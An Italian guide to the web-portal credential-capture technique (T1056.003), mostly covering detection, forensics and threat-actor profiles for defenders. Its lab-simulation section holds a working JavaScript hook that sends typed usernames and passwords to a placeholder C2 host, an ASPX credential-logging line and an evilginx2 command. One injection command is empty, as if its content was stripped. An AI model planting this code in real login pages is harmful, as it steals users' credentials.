Cattura Credenziali dal Portale Web: Web Portal Capture (T1056.003)

La simulazione di Web Portal Capture in laboratorio richiede un portale di login controllato e la capacità di iniettare JavaScript o codice server-side che catturi le credenziali prima del submit legittimo. L'obiettivo del red teamer è dimostrare quanto sia semplice trasformare una pagina autentica in un collettore di credenziali una volta ottenuto accesso al filesystem del web server.

Scenario 1 — Injection JavaScript su portale VPN (simula Cutting Edge)

L'approccio più diretto replica ciò che è stato osservato nella campagna Cutting Edge (C0029): modificare il file JavaScript caricato dalla pagina di login per aggiungere un hook sull'evento di submit del form. In laboratorio, prepara un ambiente con un portale web su Apache o Nginx e un file di login HTML/JS.

Crea uno snippet JavaScript che intercetti il submit:

document.getElementById('loginForm').addEventListener('submit', function(e) { var creds = btoa(document.getElementById('user').value + ':' + document.getElementById('pass').value); new Image().src = '<server-C2-laboratorio>/collect?d=' + creds; });

Inietta questo codice nel file JavaScript originale del portale. Per simulare l'accesso amministrativo abusato, utilizza SSH con credenziali valide verso il server e modifica il file direttamente:

echo '' >> /var/www/html/login.html

Scenario 2 — Modifica server-side su IIS/OWA (simula IceApple)

Per replicare il comportamento di IceApple (S1022) su OWA, lavora in un lab con Exchange Server e modifica la pagina di autenticazione ASPX. Inserisci un code-behind che logga le credenziali in un file locale:

File.AppendAllText(@"C:\Windows\Temp\auth.log", username + ":" + password + Environment.NewLine);

Questo approccio simula il credential logger OWA di IceApple senza componenti di rete.

Scenario 3 — Phishing portal con cattura credenziali (simula Winter Vivern)

Per replicare l'approccio di Winter Vivern (G1035), utilizza Gophish (open source) o Evilginx2 (open source) per creare una pagina di login che mima un portale governativo. Evilginx2 funziona come reverse proxy e cattura sia credenziali sia token di sessione, consentendo il bypass MFA in contesti di test autorizzato.

evilginx2 -p phishlets

Dopo aver configurato il phishlet appropriato, il tool cattura le credenziali in transito e le memorizza nel proprio database locale.

Per la validazione dell'intera catena, verifica che WARPWIRE (S1116) rappresenta l'approccio più aggressivo: cattura credenziali durante il logon web per accedere ad applicazioni layer 7 come RDP, dimostrando che il vettore non si limita al furto di password ma abilita accesso diretto ai servizi interni.

La detection di Web Portal Capture si basa su un principio fondamentale: le pagine di login dei portali esposti non dovrebbero mai cambiare al di fuori di finestre di manutenzione pianificate. Qualsiasi modifica a questi file è un evento ad alta priorità che merita investigazione immediata.

File Integrity Monitoring come prima linea

Su server Linux che ospitano portali VPN o webmail, il monitoraggio tramite auditd è il punto di partenza obbligato. Configura regole di audit sui percorsi critici:

-w /var/www/html/login.php -p wa -k portal_tampering -w /var/www/html/assets/js/ -p wa -k portal_js_change

Le syscall SYSCALL registrate da auditd (analytic AN1320) vanno correlate con i flussi di rete NSM per identificare se, subito dopo la modifica, il server inizia a generare connessioni outbound anomale — il segnale che le credenziali vengono esfiltrate verso un C2.

Su ambienti Windows con IIS — OWA, SharePoint, portali ADFS — Sysmon è essenziale. L'analytic AN1321 monitora le modifiche ai file nella web root di IIS. Configura Sysmon per catturare EventCode 11 (FileCreate) e EventCode 23 (FileDelete) su percorsi come *C:\inetpub\wwwroot*. Un alert critico scatta quando il processo che modifica il file non è msdeploy.exe o w3wp.exe ma un editor inatteso come notepad.exe, certutil.exe o powershell.exe.

Su macOS (analytic AN1322), usa fs_usage e i log unificati per tracciare modifiche ai percorsi del web server locale, correlando con cron job o script in background sospetti.

Gestione dei falsi positivi

Il tuning è cruciale per questa detection. Definisci una whitelist di processi autorizzati a modificare le web root e di finestre temporali in cui gli aggiornamenti sono attesi. Ogni modifica fuori finestra o da processo non in whitelist genera un alert P1. Per ridurre ulteriormente il rumore, correla la modifica del file con almeno uno di questi indicatori: nuove connessioni outbound dal web server, comparsa di nuovi file JavaScript non presenti nell'inventario, oppure incremento anomalo delle dimensioni dei log di autenticazione.

Controlli preventivi complementari

La mitigazione M1026 — Privileged Account Management è il pilastro preventivo. Gli account con permessi di modifica sui contenuti web dei portali di login non devono essere utilizzati per operazioni quotidiane. Implementa soluzioni PAM come CyberArk (a pagamento) o BeyondTrust (a pagamento) per il vaulting delle credenziali amministrative, e applica RBAC rigoroso con principio del least privilege. L'MFA va imposta su tutti gli account privilegiati tramite soluzioni come Duo Security (freemium) o Azure AD MFA (freemium). Per accessi just-in-time, Azure Privileged Identity Management (a pagamento) consente di concedere permessi elevati solo per finestre temporali limitate.

L'analisi forense di un Web Portal Capture ruota attorno a una domanda: quando il file di login è stato modificato, da chi, e dove sono finite le credenziali raccolte? La timeline si costruisce partendo dal filesystem del server compromesso e si estende verso le fonti di rete.

Artefatti filesystem — il punto di partenza

Sul server compromesso, il primo passo è acquisire i metadati dei file nella web root. Su Linux, il comando stat su ogni file della directory di login fornisce i timestamp di modifica, accesso e cambio di stato:

stat /var/www/html/login.php stat /var/www/html/assets/js/.js*

Confronta l'hash SHA-256 di ogni file con una baseline nota (dal backup o dal repository di versionamento). La campagna Cutting Edge (C0029) ha dimostrato come la modifica del JavaScript caricato dalla pagina di login di Ivanti Connect Secure fosse l'artefatto primario: un diff tra il file originale e quello modificato rivela lo snippet di cattura credenziali.

Su server IIS (scenario IceApple, S1022), esamina i file ASPX nella directory di OWA. Il journal NTFS ($UsnJrnl) registra ogni operazione di creazione e modifica nella web root:

fsutil usn readjournal C: csv | findstr "login.aspx"

Analizza i log IIS in *C:\inetpub\logs\LogFiles* per identificare richieste POST anomale verso endpoint non standard — un indicatore di esfiltrazione credenziali.

Log di autenticazione e correlazione temporale

Nella campagna Triton Safety Instrumented System Attack (C0030), TEMP.Veles reindirizzava codici di login text-based verso siti sotto il proprio controllo. Per questo tipo di scenario, i log del servizio di autenticazione sono fondamentali: esamina i log di accesso del portale per identificare sessioni in cui il login è avvenuto con successo ma le credenziali sono state contemporaneamente inviate a un host esterno.

Correla i timestamp di modifica dei file con i log auditd (ausearch -k portal_tampering) per ricostruire la sequenza: accesso SSH dell'attaccante → modifica del file → prima esfiltrazione di credenziali. Su sistemi con Sysmon, filtra gli eventi EventCode 11 sulla web root per stabilire il momento esatto dell'injection.

Analisi di rete post-compromissione

Esamina i flussi di rete catturati dal NSM per connessioni outbound originate dal web server verso IP non noti. Se il portale è stato modificato con uno snippet che invia credenziali via HTTP GET (come nell'approccio Image().src), cerca nei log del proxy o del firewall richieste verso URL contenenti parametri Base64-encoded. Per l'approccio WARPWIRE (S1116), che cattura credenziali per accesso a servizi layer 7 come RDP, verifica se dopo le modifiche al portale sono comparsi nuovi accessi RDP da IP interni anomali — segnale che le credenziali raccolte sono già state utilizzate.

L'analisi dei gruppi e delle campagne associati a T1056.003 rivela un pattern chiaro: la cattura credenziali via portale web è una tecnica trasversale, adottata sia da attori statali sofisticati sia in contesti di spionaggio industriale, con un denominatore comune — lo sfruttamento di appliance e servizi esposti su Internet.

Winter Vivern (G1035) opera con un approccio che privilegia l'inganno rispetto allo sfruttamento tecnico diretto. Il gruppo registra domini e crea pagine web che mimano portali governativi di posta elettronica, raccogliendo credenziali di login da utenti che credono di accedere al servizio legittimo. Questo modus operandi suggerisce un focus su target governativi e diplomatici, con una catena d'attacco che parte dal social engineering e sfrutta infrastruttura dedicata piuttosto che la compromissione diretta dei portali autentici.

La campagna Cutting Edge (C0029), condotta da attori con nexus cinese identificati come UNC5221/UTA0178 e UNC5325, rappresenta l'evoluzione più pericolosa della tecnica. L'exploitation di vulnerabilità zero-day in Ivanti Connect Secure ha permesso di modificare direttamente il JavaScript della pagina di login del dispositivo VPN. I settori colpiti — base industriale della difesa USA, telecomunicazioni, finanziario, aerospaziale e tecnologico — delineano un profilo di spionaggio strategico su scala globale. L'uso combinato di tecniche living-off-the-land, web shell e malware custom indica capacità operative elevate e volontà di persistenza a lungo termine.

La campagna Triton Safety Instrumented System Attack (C0030), condotta da TEMP.Veles contro un'organizzazione petrolchimica, rappresenta un caso unico: la cattura credenziali tramite reindirizzamento di codici di login text-based è stata impiegata in un contesto OT/ICS. La tecnica serviva come enabler per il mantenimento dell'accesso all'ambiente che ospitava i Safety Instrumented Systems Triconex.

Sul piano del software, WARPWIRE (S1116) e IceApple (S1022) illustrano due filosofie diverse. WARPWIRE è focalizzato sulla cattura credenziali durante il logon web per accedere ad applicazioni layer 7, operando come componente specializzato. IceApple include un modulo credential logger per OWA come parte di un framework più ampio, suggerendo un toolkit modulare progettato per ambienti Microsoft Exchange.

Il trend emergente è la convergenza tra exploitation di appliance perimetrali (VPN, gateway) e injection di codice nelle loro interfacce web di autenticazione. Per il TI analyst, monitorare le vulnerabilità su dispositivi Ivanti, Pulse Secure, Fortinet e Citrix e correlare con indicatori di modifica delle pagine di login rappresenta un early warning ad alto valore predittivo.

Framework MITRE ATT&CK v16 — T1056.003 (Web Portal Capture), TA0009, TA0006. Campagne: C0029 (Cutting Edge), C0030 (Triton Safety Instrumented System Attack). Gruppo: G1035 (Winter Vivern). Software: S1116 (WARPWIRE), S1022 (IceApple). Mitigazione: M1026. Detection: DET0480 (AN1320, AN1321, AN1322). Integrato con conoscenza professionale per tool e procedure operative.